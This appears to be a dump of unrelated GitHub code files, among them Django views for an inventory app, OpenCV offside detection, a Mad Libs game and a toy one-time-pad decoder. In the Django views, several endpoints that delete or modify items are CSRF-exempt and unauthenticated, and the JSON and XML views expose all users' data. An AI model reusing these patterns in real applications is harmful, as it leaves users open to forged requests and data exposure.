import pandas as pd\n bleu = evaluate.load(\"bleu\")\n df = pd.read_csv(\"chitchat/emp_data_out.csv\")\n bot_out = []\n out = []\n for index, row in df.iterrows():\n if not pd.isnull(row['bot_out']) and not pd.isnull(row['recv']):\n out.append(row['recv'].strip())\n bot_out.append(row['bot_out'].strip())\n results = bleu.compute(predictions=bot_out,references=out)\n print(results)\n\nbleu()","repo_name":"ankitshaw/CSE635_NLP_Project","sub_path":"eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"30324820888","text":"from django.shortcuts import render\nfrom django.http import HttpResponseRedirect\nfrom django.http import HttpResponse\nfrom django.core import serializers\nfrom main.forms import ItemForm, Item\nfrom django.urls import reverse\nfrom django.shortcuts import redirect\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib import messages \nfrom django.contrib.auth import authenticate, login \nfrom django.contrib.auth import logout\nfrom django.contrib.auth.decorators import login_required\nimport datetime\nfrom django.http import HttpResponseRedirect\nfrom django.urls import reverse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.http import HttpResponseNotFound\nfrom django.http import JsonResponse\nimport json\nfrom django.contrib.auth import logout as auth_logout\n\n# Create your views here.\n\n# def show_item()\n@login_required(login_url='/login')\ndef show_main(request):\n items = Item.objects.filter(user = request.user)\n context = {\n 'name': request.user.username, \n 'items': items,\n 'last_login': request.COOKIES['last_login'],\n 'pembuat' : 'Tsabit Coda R - PBP C'\n }\n\n return render(request, \"main.html\", context)\n\ndef create_Item(request):\n # message = ''\n form = ItemForm(request.POST or None)\n\n if form.is_valid() and 
request.method == \"POST\":\n item = form.save(commit=False)\n item.user = request.user\n item.save()\n return HttpResponseRedirect(reverse('main:show_main'))\n\n context = {'form': form}\n return render(request, \"create_Item.html\", context)\n\ndef show_xml(request):\n data = Item.objects.all()\n return HttpResponse(serializers.serialize(\"xml\", data), content_type=\"application/xml\")\n\ndef show_json(request):\n data = Item.objects.all()\n return HttpResponse(serializers.serialize(\"json\", data), content_type=\"application/json\")\n\ndef show_json_by_id(request,id):\n data = Item.objects.filter(pk=id)\n return HttpResponse(serializers.serialize(\"json\", data), content_type=\"application/json\")\n\ndef show_xml_by_id(request,id):\n data = Item.objects.filter(pk=id)\n return HttpResponse(serializers.serialize(\"xml\", data), content_type=\"application/xml\")\n\ndef register(request):\n form = UserCreationForm()\n\n if request.method == \"POST\":\n form = UserCreationForm(request.POST)\n if form.is_valid():\n form.save()\n messages.success(request, 'Welcome Gamers! Your account has been successfully created!')\n return redirect('main:login')\n context = {'form':form}\n return render(request, 'register.html', context)\n\ndef login_user(request):\n if request.method == 'POST':\n username = request.POST.get('username')\n password = request.POST.get('password')\n user = authenticate(request, username=username, password=password)\n if user is not None:\n login(request,user)\n response = HttpResponseRedirect(reverse(\"main:show_main\"))\n response.set_cookie('last_login', str(datetime.date.today()))\n return response\n else:\n messages.info(request, 'Sorry, incorrect username or password. Please try again.')\n context = {}\n return render(request, 'login.html', context)\n\n\ndef logout_user(request):\n logout(request)\n response = HttpResponseRedirect(reverse('main:login'))\n response.delete_cookie('last_login')\n return response\n\n@csrf_exempt\ndef kurang_amount(request,id):\n barang_check = Item.objects.get(pk=id)\n if barang_check.amount > 1:\n barang_check.amount -= 1\n barang_check.save()\n else:\n barang_check.delete()\n return HttpResponseRedirect(reverse('main:show_main'))\n\n@csrf_exempt\ndef tambah_amount(request,id):\n barang_check = Item.objects.get(pk=id)\n barang_check.amount += 1\n barang_check.save()\n return HttpResponseRedirect(reverse('main:show_main'))\n\n@csrf_exempt\ndef hapus_item(request,id):\n barang_check = Item.objects.get(pk=id)\n barang_check.delete()\n return HttpResponseRedirect(reverse('main:show_main'))\n\ndef get_product_json(request):\n data = Item.objects.filter(user = request.user)\n return HttpResponse(serializers.serialize('json', data))\n\n@csrf_exempt\ndef add_product_ajax(request):\n if request.method == 'POST':\n name = request.POST.get(\"name\")\n price = request.POST.get(\"price\")\n description = request.POST.get(\"description\")\n amount = request.POST.get(\"amount\")\n user = request.user\n\n new_product = Item(name=name, price=price, description=description,amount=amount, user=user)\n new_product.save()\n\n return HttpResponse(b\"CREATED\", status=201)\n\n return HttpResponseNotFound()\n\n@csrf_exempt\ndef kurang_amount_ajax(request,id):\n barang_check = Item.objects.get(pk=id)\n if barang_check.amount > 1:\n barang_check.amount -= 1\n barang_check.save()\n return HttpResponse(b\"CREATED\", status=201)\n else:\n barang_check.delete()\n # return HttpResponseRedirect(reverse('main:show_main'))\n return HttpResponse(b\"NOT CREATED\", 
status=201)\n\n@csrf_exempt\ndef tambah_amount_ajax(request,id):\n barang_check = Item.objects.get(pk=id)\n barang_check.amount += 1\n barang_check.save()\n # return HttpResponseRedirect(reverse('main:show_main'))\n return HttpResponse(b\"ADD\", status=201)\n\n@csrf_exempt\ndef hapus_item_ajax(request,id):\n barang_check = Item.objects.get(pk=id)\n barang_check.delete()\n return HttpResponseRedirect(reverse('main:show_main'))\n\n@csrf_exempt\ndef create_product_flutter(request):\n if request.method == 'POST':\n \n data = json.loads(request.body)\n\n new_product = Item.objects.create(\n user = request.user,\n name = data[\"name\"],\n price = int(data[\"price\"]),\n amount = int(data[\"amount\"]),\n description = data[\"description\"],\n # date_added = data([\"date_added\"])\n )\n\n new_product.save()\n\n return JsonResponse({\"status\": \"success\"}, status=200)\n else:\n return JsonResponse({\"status\": \"error\"}, status=401)\n \n","repo_name":"codaaa19/TugasKeduaPBP","sub_path":"main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11936163673","text":"# USAGE\n# To detect offside in a pre-recorded video, type the following in terminal:\n# python Offside_detection.py -v 'name of video file'\n#\n# To detect offside from live camera feed:\n# python Offside_detection.py\n#\n# while running the program, press 'i' to input and 'q' to quit\n\nimport cv2\nimport numpy as np\nimport track_utils\nfrom collections import deque\nimport math\n\nframe = None\norig_frame = None\nroi_hist_A, roi_hist_B = None, None\nroi = None\n\nteam = None\n\n\nteamA = np.array([])\nteamB = np.array([])\nteamB_new = np.array([])\nteamA_new = np.array([])\npts = []\n\nminDist = 0\nprevTeam = None\nprevPasser = -1\n\nM = None\nop = None\nlimits = None\nball_center = None\n\nkernel = np.array([[0, 0, 1, 1, 0, 0],\n [0, 0, 1, 1, 0, 0],\n [1, 1, 1, 1, 1, 1],\n [1, 1, 1, 1, 1, 1],\n [0, 0, 1, 1, 0, 0],\n [0, 0, 1, 1, 0, 0]], dtype=np.uint8)\n\nprevgrad = 0\npasses = 0\n\nvel, prev_vel = 0, 0\n\npts_ball = deque()\n\n\ndef trackBall():\n\n global grad, prevgrad, passes, ball_center, pts_ball, frame, vel, prev_vel, prevPasser, prevTeam, minDist\n pts_ball.appendleft(ball_center)\n\n if len(pts_ball) > 2:\n if len(pts_ball) > 20:\n\n for i in xrange(1, 20):\n cv2.line(frame, pts_ball[i - 1], pts_ball[i], (0, 0, 255), 2, cv2.LINE_AA)\n else:\n for i in xrange(1, len(pts_ball)):\n cv2.line(frame, pts_ball[i - 1], pts_ball[i], (0, 0, 255), 2, cv2.LINE_AA)\n\n\n l = len(pts_ball)\n if l >= 10:\n grad = np.arctan2((pts_ball[9][1] - pts_ball[0][1]), (pts_ball[9][0] - pts_ball[0][0]))\n grad = grad * (180.0 / np.pi)\n grad %= 360\n\n vel = math.sqrt((pts_ball[9][1] - pts_ball[0][1]) ** 2 + (pts_ball[9][0] - pts_ball[0][0]) ** 2) / 10\n if (math.fabs(grad - prevgrad) >= 20):\n # or math.fabs(vel-prev_vel) >= 7:\n # detectPlayers()\n # print(\"a \" + str(len(teamA)) + \" b \" + str(len(teamB)))\n if len(teamA) != 0 and len(teamB) != 0:\n getCoordinates()\n detectPasser()\n\n # print(passerIndex)\n\n if ((prevTeam != team) or (passerIndex != prevPasser)) and minDist < 10000:\n # print(minDist)\n # print(str(team) + str(passerIndex))\n if (team == 'A'):\n\n detectOffside()\n else:\n print('Not offside')\n\n passes += 1\n #print('Ball Passed ' + str(passes))\n prevPasser = passerIndex\n prevTeam = team\n\n\n prevgrad = grad\n prev_vel = vel\n\n\n\ndef detectPlayers():\n global frame, roi_hist_A, 
roi_hist_B, teamA, teamB\n teamA = []\n teamB = []\n\n hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n cnt_thresh = 180\n if roi_hist_A is not None:\n backProjA = cv2.calcBackProject([hsv], [0, 1], roi_hist_A, [0, 180, 0, 256], 1)\n maskA = track_utils.applyMorphTransforms2(backProjA)\n #cv2.imshow('mask a', maskA)\n\n cnts = cv2.findContours(maskA.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)[-2]\n\n if len(cnts) > 0:\n c = sorted(cnts, key=cv2.contourArea, reverse=True)\n for i in range(len(c)):\n if cv2.contourArea(c[i]) < cnt_thresh:\n break\n\n x, y, w, h = cv2.boundingRect(c[i])\n h += 5\n y -= 5\n if h < 0.8 * w:\n continue\n elif h / float(w) > 3:\n continue\n\n cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 0, 255), 2)\n M = cv2.moments(c[i])\n center = (int(M[\"m10\"] / M[\"m00\"]), int(M[\"m01\"] / M[\"m00\"]))\n foot = (center[0], int(center[1] + h * 1.5))\n teamA.append(foot)\n cv2.circle(frame, foot, 5, (0, 0, 255), -1)\n if roi_hist_B is not None:\n backProjB = cv2.calcBackProject([hsv], [0, 1], roi_hist_B, [0, 180, 0, 256], 1)\n maskB = track_utils.applyMorphTransforms2(backProjB)\n #cv2.imshow('mask b', maskB)\n\n cnts = cv2.findContours(maskB.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)[-2]\n\n if len(cnts) > 0:\n c = sorted(cnts, key=cv2.contourArea, reverse=True)\n for i in range(len(c)):\n if cv2.contourArea(c[i]) < cnt_thresh:\n break\n x, y, w, h = cv2.boundingRect(c[i])\n h += 5\n y -= 5\n if h < 0.9 * w:\n continue\n elif h / float(w) > 3:\n continue\n\n cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 2)\n M = cv2.moments(c[i])\n center = (int(M[\"m10\"] / M[\"m00\"]), int(M[\"m01\"] / M[\"m00\"]))\n\n foot = (center[0], int(center[1] + h * 1.2))\n\n teamB.append(foot)\n cv2.circle(frame, foot, 5, (0, 0, 255), -1)\n\n\ndef selectPoints(event, x, y, flag, param):\n global pts, frame, orig_frame\n\n if event == cv2.EVENT_LBUTTONUP:\n if len(pts) < 8:\n pts.append([x, y])\n cv2.circle(frame, (x, y), 5, (0, 0, 255), -1)\n else:\n print('You have already selected 8 points')\n\n\ndef getBoundaryPoints():\n global frame, pts\n end_pts = []\n cv2.namedWindow('input field')\n cv2.setMouseCallback('input field', selectPoints)\n while True:\n cv2.imshow('input field', frame)\n key = cv2.waitKey(1) & 0xFF\n if len(pts) >= 8:\n pts = np.array(pts, dtype=np.float32)\n pts[:, 1] *= (-1)\n for i in range(0, 5, 2):\n m1 = (pts[i + 1][1] - pts[i][1]) / (pts[i + 1][0] - pts[i][0])\n m2 = (pts[i + 3][1] - pts[i + 2][1]) / (pts[i + 3][0] - pts[i + 2][0])\n A = np.array([[m1, -1], [m2, -1]])\n A_inv = np.linalg.inv(A)\n B = np.array([pts[i][1] - m1 * pts[i][0], pts[i + 2][1] - m2 * pts[i + 2][0]])\n B *= (-1)\n p = np.dot(A_inv, B)\n end_pts.append(np.int16(p))\n m1 = (pts[7][1] - pts[6][1]) / (pts[7][0] - pts[6][0])\n m2 = (pts[1][1] - pts[0][1]) / (pts[1][0] - pts[0][0])\n A = np.array([[m1, -1], [m2, -1]])\n A_inv = np.linalg.inv(A)\n B = np.array([pts[6][1] - m1 * pts[6][0], pts[0][1] - m2 * pts[0][0]])\n B *= (-1)\n p = np.dot(A_inv, B)\n end_pts.append(np.int16(p))\n end_pts = np.array(end_pts)\n end_pts[:, 1] *= (-1)\n break\n elif key == ord(\"q\"):\n break\n cv2.destroyWindow('input field')\n return end_pts\n\n\ndef getCoordinates():\n\n global M, teamA, teamB, op, teamB_new, teamA_new, ball_new, ball_center\n teamB_new = np.array([])\n teamA_new = np.array([])\n op = orig_op.copy()\n if ball_center is not None:\n new = np.dot(M, [ball_center[0], ball_center[1], 1])\n ball_new = [new[0] / new[2], new[1] / new[2]]\n
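# ball_new is the ball position mapped into the top view: np.dot applies the\n # homography M, and dividing by new[2] is the perspective (homogeneous) divide\n op = cv2.circle(op, (int(ball_new[0]), 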
int(ball_new[1])), 3, (255, 0, 0), -1)\n\n if len(teamB) > 0:\n for i in range(len(teamB)):\n new_pt = np.dot(M, [teamB[i][0], teamB[i][1], 1])\n teamB_new = np.append(teamB_new, [new_pt[0] / new_pt[2], new_pt[1] / new_pt[2]])\n\n teamB_new = np.int16(teamB_new).reshape(-1, 2)\n for i in range(len(teamB)):\n op = cv2.circle(op, (teamB_new[i][0], teamB_new[i][1]), 5, (0, 255, 0), -1)\n\n if len(teamA) > 0:\n for i in range(len(teamA)):\n new_pt = np.dot(M, [teamA[i][0], teamA[i][1], 1])\n teamA_new = np.append(teamA_new, [new_pt[0] / new_pt[2], new_pt[1] / new_pt[2]])\n\n teamA_new = np.int16(teamA_new).reshape(-1, 2)\n for i in range(len(teamA)):\n op = cv2.circle(op, (teamA_new[i][0], teamA_new[i][1]), 5, (0, 0, 255), -1)\n\n\ndef drawOffsideLine():\n global M, teamB_new, op, frame\n if len(teamB_new) > 0:\n M_inv = np.linalg.inv(M)\n last_def = np.argmin(teamB_new[:,0])\n p1 = np.dot(M_inv, [teamB_new[last_def][0], 0, 1])\n p2 = np.dot(M_inv, [teamB_new[last_def][0], op.shape[0] - 1, 1])\n\n pts = [(int(p1[0] / p1[2]), int(p1[1] / p1[2])), (int(p2[0] / p2[2]), int(p2[1] / p2[2]))]\n frame = cv2.line(frame, pts[0], pts[1], (255, 0, 0), 2)\n\n\ndef closest_node(node, nodes):\n nodes = np.asarray(nodes)\n node = np.array([node[0], node[1]])\n # print(nodes)\n # print(node)\n dist_2 = np.sum((nodes - node) ** 2, axis=1)\n\n return np.argmin(dist_2)\n\n\ndef detectPasser():\n global ball_new, teamA, teamB, passerIndex, team, minDist\n teamA_min_ind = closest_node(ball_new, teamA_new)\n teamB_min_ind = closest_node(ball_new, teamB_new)\n # print(np.asarray(teamA[teamA_min_ind]))\n # print(np.asarray(ball_center))\n teamA_min = np.sum(([np.asarray(teamA_new[teamA_min_ind])] - np.asarray(ball_new)) ** 2, axis=1)\n teamB_min = np.sum(([np.asarray(teamB_new[teamB_min_ind])] - np.asarray(ball_new)) ** 2, axis=1)\n minDist = min(teamB_min, teamA_min)\n if (teamA_min < teamB_min):\n # print(\"Ball passed by TeamA player\")\n\n passerIndex = teamA_min_ind\n # print(passerIndex)\n team = 'A'\n else:\n # print(\"Ball passed by TeamB player\")\n passerIndex = teamB_min_ind\n team = 'B'\n\n\ndef detectOffside():\n global teamA_new, teamB_new, passerIndex\n if len(teamB_new) > 0:\n if len(teamA_new) > 0:\n # teamA_new.sort()\n teamB_new.sort()\n # print(teamA_new)\n if (teamB_new[0][0] > teamA_new[passerIndex][0]):\n # if (teamB[0][0] > teamA[passerIndex][0]):\n # print(passerIndex)\n # Assuming no goalie\n print('Offside')\n else:\n print('Not Offside')\n else:\n print('Not Offside')\n else:\n print('Not Offside')\n\n\n\nif __name__ == '__main__':\n args = track_utils.getArguements()\n\n if not args.get(\"video\", False):\n camera = cv2.VideoCapture(0)\n else:\n camera = cv2.VideoCapture(args[\"video\"])\n\n orig_op = cv2.imread('soccer_half_field.jpeg')\n op = orig_op.copy()\n fgbg = cv2.createBackgroundSubtractorMOG2(history=20, detectShadows=False)\n flag = False\n\n while True:\n (grabbed, frame) = camera.read()\n\n if args.get(\"video\") and not grabbed:\n break\n\n frame = track_utils.resize(frame, width=400)\n\n orig_frame = frame.copy()\n\n frame2 = track_utils.removeBG(orig_frame.copy(), fgbg)\n\n detectPlayers()\n\n if roi is not None:\n ball_center, cnt = track_utils.detectBallThresh(frame2, limits)\n if cnt is not None:\n (x, y), radius = cv2.minEnclosingCircle(cnt)\n cv2.circle(frame, (int(x), int(y)), int(radius), (255, 255, 0), 2)\n cv2.circle(frame, ball_center, 2, (0, 0, 255), -1)\n trackBall()\n\n if M is not None:\n src = np.int32(src)\n\n for i in range(4):\n frame = 
cv2.circle(frame.copy(), (src[i][0], src[i][1]), 3, (255, 0, 255), -1)\n\n cv2.polylines(frame, np.int32([src]), True, (255, 0, 0), 2, cv2.LINE_AA)\n\n getCoordinates()\n\n drawOffsideLine()\n\n cv2.imshow('camera view', frame)\n cv2.imshow('top view', op)\n\n if flag:\n t = 1\n else:\n t = 100\n\n key = cv2.waitKey(t) & 0xFF\n\n if key == ord(\"q\"):\n break\n elif key == ord('i') and (roi_hist_A is None or roi_hist_B is None):\n flag = True\n roi_hist_A, roi_hist_B = track_utils.getHist(frame)\n\n roi = track_utils.getROIvid(orig_frame, 'input ball')\n if roi is not None:\n limits = track_utils.getLimits(roi)\n\n src = getBoundaryPoints()\n src = np.float32(src)\n dst = np.float32([[0, 0], [0, op.shape[0]], [op.shape[1], op.shape[0]], [op.shape[1], 0]])\n M = cv2.getPerspectiveTransform(src, dst)\n\n camera.release()\n cv2.destroyAllWindows()\n","repo_name":"kparth98/ITSP-Project","sub_path":"Offside_detection.py","file_name":"Offside_detection.py","file_ext":"py","file_size_in_byte":12293,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"61"} +{"seq_id":"23560686761","text":"from __future__ import print_function\nimport sys\n\ndef tidy(t):\n for i in range(len(t)-1, -1, -1):\n lte = True\n for j in range(i, len(t)):\n if t[i] > t[j]:\n lte = False\n break\n if not lte:\n front = t[:i]\n middle = str(int(t[i]) - 1)\n end = '9' * (len(t) - i - 1)\n t = front + (middle if middle != \"0\" else \"\") + end\n return t\n\ndata = sys.stdin.readlines()\n\nn = int(data[0])\n\nfor i in range(1, 1 + n):\n line = data[i].strip()\n print(\"Case #{}: {}\".format(i, tidy(line)))\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_200/4139.py","file_name":"4139.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33078549614","text":"import numpy as np\nimport cv2 as cv\ncap = cv.VideoCapture('walk.avi')\n#kernel=cv.getStructuringElement(cv.MORPH_ELLIPSE,(3,3))\nfgbg = cv.createBackgroundSubtractorKNN(detectShadows=False)\nwhile(1):\n ret, frame = cap.read()\n fgmask = fgbg.apply(frame)\n #fgmask=cv.morphologyEx(fgmask,cv.MORPH_OPEN,kernel)\n cv.imshow('frame',fgmask)\n k = cv.waitKey(30) & 0xff\n if k == 27:\n break\ncap.release()\ncv.destroyAllWindows()\n","repo_name":"akshitagupta15june/opencv","sub_path":"background_substraction.py","file_name":"background_substraction.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"41930411621","text":"from django.db import models\nfrom django.contrib.auth import get_user_model \nfrom mptt.models import MPTTModel, TreeForeignKey\nfrom file_manager_mptt.utils.node_types import NODE_TYPE, FOLDER, FILE\nfrom file_manager_mptt.exceptions.file_node_exception import FileNodeException\nfrom file_manager_mptt.exceptions.errors import Errors\nfrom file_manager_mptt.helpers.general_functions import unique_slug_generator\nimport uuid\n# Create your models here.\n\n## identifiers\n\nclass FileMpttModel(MPTTModel):\n\n id = models.UUIDField(verbose_name=\"File Node ID\", primary_key=True, default=uuid.uuid4, editable=False)\n name = models.CharField(max_length=100)\n parent = TreeForeignKey('self', null=True, related_name='children', on_delete=models.CASCADE)\n type = models.IntegerField(choices=NODE_TYPE)\n slug = models.SlugField(max_length=500, unique=True, blank=True)\n owner = 
models.ForeignKey(get_user_model(), related_name='volumen', on_delete=models.PROTECT)\n deleted = models.BooleanField(default=False)\n\n created_date = models.DateTimeField(auto_now_add=True)\n updated_date = models.DateTimeField(auto_now=True)\n\n class Meta:\n abstract = True\n\n \n\n def is_folder(self):\n return self.type == FOLDER\n\n\n def is_file(self):\n return self.type == FILE\n\n\n def get_children(self, *args, **kwargs):\n filters = dict(**kwargs)\n return super().get_children().filter(**filters)\n \n\n def slug_generator(self):\n return unique_slug_generator(self)\n\n \n\n def save(self, *args, **kwargs):\n \n if not self.created_date:\n self.slug = self.slug_generator()\n\n if self.parent and self.parent.is_file():\n raise FileNodeException(Errors._FILE_CANNOT_HAVE_CHILDREN)\n \n\n super(FileMpttModel, self).save(*args, **kwargs) \n\n","repo_name":"Agent-Hellboy/file-manager-mptt","sub_path":"file_manager_mptt/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13482986308","text":"# MAD LIBS\n\n# SPECIFICATIONS: Create a program that contains a script with some lines left blank for user input.\n# Prompt the user for input to fill in the blanks, asking for appropriate parts of speech.\n# After the user has entered in their contents, print out the story script with their entries to reveal\n# their unique (and probably hilarious) story. Advanced Features: 1. A loop that allows them to play the\n# game continuously, 2. A menu bar with 2-3 story templates to choose from, 3. color-coded words to\n# differentiate the user-input words from the story script.\n\n\ndef story1():\n import time\n\n blue = \"\\033[0;34m\"\n end = \"\\033[0m\"\n\n print('\\nLet\\'s get started!')\n time.sleep(1)\n print('Please add some of your own words to make this story uniquely your own ...\\n')\n time.sleep(1)\n\n adj = blue + input('Adjective: ') + end\n animal = blue + input('Animal: ') + end\n country = blue + input('Country: ') + end\n name = blue + input('Name: ') + end\n foods = blue + input('Foods (plural): ') + end\n\n story_1 = f'''\\nThere once was a {adj} {animal} named, {name}. It lived in the country {country}, \nand for all its life it always grazed on {foods}. How peaceful . . . yet boring. The end.'''\n print('Generating story ...')\n time.sleep(3)\n for letter in story_1:\n print(letter, end='')\n time.sleep(.09)\n\n\ndef story2():\n blue = \"\\033[0;34m\"\n end = \"\\033[0m\"\n\n print('\\nLet\\'s get started!')\n time.sleep(1)\n print('Please add some of your own words to make this story uniquely your own ...\\n')\n time.sleep(1)\n\n noun = blue + input('Noun: ') + end\n name1 = blue + input('Name: ') + end\n adj = blue + input('Adjective: ') + end\n place = blue + input('Place (plural): ') + end\n name2 = blue + input('Another name: ') + end\n\n story_2 = f'''\\nOnce there was a {noun} named {name1}. {name1} lived in a big {adj} \nhouse with its grandmother {name2}. One day the {noun} {name1} and {noun} Grandma {name2} \nwanted to go out. \\\"Where do you want to go today, {name1}?\\\", asked Grandma {name2}. \n\\\"I want to go to {place},\\\" said {name1}. And then they did go to {place}. 
\nThey surely, surely did.'''\n print('Generating story ...')\n time.sleep(3)\n for letter in story_2:\n print(letter, end='')\n time.sleep(.09)\n\n\ndef story3():\n blue = \"\\033[0;34m\"\n end = \"\\033[0m\"\n\n print('\\nLet\\'s get started!')\n time.sleep(1)\n print('Please add some of your own words to make this story uniquely your own ...\\n')\n time.sleep(1)\n\n happyplace = blue + input('Happy place: ') + end\n homeplace = blue + input('Place in a home: ') + end\n plang1 = blue + input('Programming Language: ') + end\n name = blue + input('Name: ') + end\n plang2 = blue + input('Another programming language: ') + end\n\n story_3 = f'''\\nThere once was a coder named {name}. {name} was such a hacker, and {name} \njust coded and learned, and couldn't be stopped. First, {name} learned {plang1}. Then {name} \nlearned {plang2}. After that {name} felt like they deserved a reward, so they went to \n{happyplace}. But as they were getting ready, they were so tired that they fell asleep, \nright there in their {homeplace}. EL FIN!'''\n print('Generating story ...')\n time.sleep(3)\n for letter in story_3:\n print(letter, end='')\n time.sleep(.09)\n\n\nimport time\n\nwhile True:\n print('Hello! Welcome to Mad Libs!')\n time.sleep(1)\n print('To get started, please choose your story ...\\n')\n time.sleep(1)\n print('OPTION 1: The Unexpected Fruit of No Labor')\n time.sleep(1)\n print('OPTION 2: Grandma')\n time.sleep(1)\n print('OPTION 3: A True Exhaustion Story')\n time.sleep(1)\n while True:\n story = input('Please enter 1, 2, or 3 for your story choice: ')\n if story == '1':\n story1()\n break\n if story == '2':\n story2()\n break\n if story == '3':\n story3()\n break\n else:\n print('Please enter the number 1, 2, or 3 as your story option. No funny business!')\n continue\n\n restart = input('\\n\\nThanks for playing Mad Libs! Would you like to play again? 
')\n if restart.lower() == 'yes' or restart.lower() == 'y':\n print('\\n')\n continue\n else:\n print('\\nCome back any time!')\n break\nquit()\n","repo_name":"larebear007/Mad_Libs","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12273344420","text":"import string\n\ndef next_bin_number(n):\n bin_list = list(n)\n for i in range(len(bin_list) - 1, -1, -1):\n if bin_list[i] == \"0\":\n bin_list[i] = \"1\"\n break\n else:\n bin_list[i] = \"0\"\n return ''.join(bin_list)\n\ndef G2F_add(a, b):\n if a == '1' and b == '1':\n return '0'\n if a == '0' and b == '0':\n return '0'\n return '1'\n\ndef decrypt(encoded_string, key, bin2char):\n decrypted_string = \"\"\n for i in range(0,55):\n decrypted_string += G2F_add(encoded_string[i], key[i%5])\n readable = \"\"\n for i in range(0,55,5):\n if decrypted_string[i:i+5] in bin2char:\n readable += bin2char[decrypted_string[i:i+5]]\n else:\n return\n if 'e' in readable and ' ' in readable: #reduce the possibilities by assuming an e and space\n print(readable)\n\n\nletters = list(string.ascii_lowercase)\nletters.append(' ')\nencoded_string = \"1010100100101010101111001000110101110101001001100111010\"\nkey = \"00000\"\n\nchar2bin = {}\nstart = \"00000\"\nfor char in letters:\n char2bin[char] = start\n start = next_bin_number(start)\n\nbin2char = {v: k for k, v in char2bin.items()}\n\ndecrypt(encoded_string, key, bin2char)\nwhile key != \"11111\":\n key = next_bin_number(key)\n decrypt(encoded_string, key, bin2char)\n\n","repo_name":"PhilipKlein/CodingTheMatrix","sub_path":"TheField/one_time_pad.py","file_name":"one_time_pad.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1764429079","text":"from dataclasses import dataclass, field\nfrom typing import List\nfrom math import prod\n\n@dataclass\nclass TreeLine:\n line_o_trees: List[bool]\n\n@dataclass\nclass Treemap:\n tree_line: List[TreeLine]\n\n@dataclass\nclass Slope:\n Right: int\n Down: int\n\n\n\n\ndef process_line(line: str) -> TreeLine:\n # You make a map (your puzzle input) of the open squares (.) and trees (#) you can see.\n is_tree = '#'\n line_o_trees = []\n for char in line:\n if char == is_tree:\n line_o_trees.append(True)\n elif char == '.':\n line_o_trees.append(False)\n else:\n pass\n return TreeLine(line_o_trees)\n\nwith open('input/input.txt','r', newline='\\n') as file:\n lines = file.readlines()\n treemap = Treemap([])\n for line in lines:\n print(line)\n treemap.tree_line.append(process_line(line))\n\n # You start on the open square (.) 
in the top-left corner\n right_num = 0\n tree_hit_num = 0\n tree_mod = len(treemap.tree_line[0].line_o_trees)\n for tree_line in treemap.tree_line:\n right_num_w_mod = right_num % tree_mod\n print(tree_line, f'checking line on index {right_num_w_mod}')\n if tree_line.line_o_trees[right_num_w_mod]:\n # how many trees would you encounter?\n tree_hit_num += 1\n print('hit a tree on line')\n # The toboggan can only follow a few specific slopes\n # (you opted for a cheaper model that prefers rational numbers);\n # start by counting all the trees you would encounter for the slope right 3, down 1\n right_num += 3\n print(f'to get to the bottom you encounter {tree_hit_num} trees')\n\n # Determine the number of trees you would encounter if, for each of the following slopes\n slopes = [\n Slope(1,1),\n Slope(3, 1),\n Slope(5, 1),\n Slope(7, 1),\n Slope(1, 2)\n ]\n\n tree_hit_nums = []\n for slope in slopes:\n right_num = 0\n tree_hit_num = 0\n for ix, tree_line in enumerate(treemap.tree_line):\n if ix == 0 or ix % slope.Down == 0:\n right_num_w_mod = right_num % tree_mod\n # print(tree_line, f'checking line on index {right_num_w_mod}')\n if tree_line.line_o_trees[right_num_w_mod]:\n # how many trees would you encounter?\n tree_hit_num += 1\n # The toboggan can only follow a few specific slopes\n # (you opted for a cheaper model that prefers rational numbers);\n # start by counting all the trees you would encounter for the slope right 3, down 1\n right_num += slope.Right\n print(f'to get to the bottom you encounter {tree_hit_num} trees for Right {slope.Right} and Down {slope.Down} ')\n tree_hit_nums.append(tree_hit_num)\n print(f'The multiple of all the answers is {prod(tree_hit_nums)}')","repo_name":"Spasnof/advent2020","sub_path":"day/3/day3.py","file_name":"day3.py","file_ext":"py","file_size_in_byte":2899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34785951725","text":"raise NotImplementedError('*** this tutorial is out of date. 
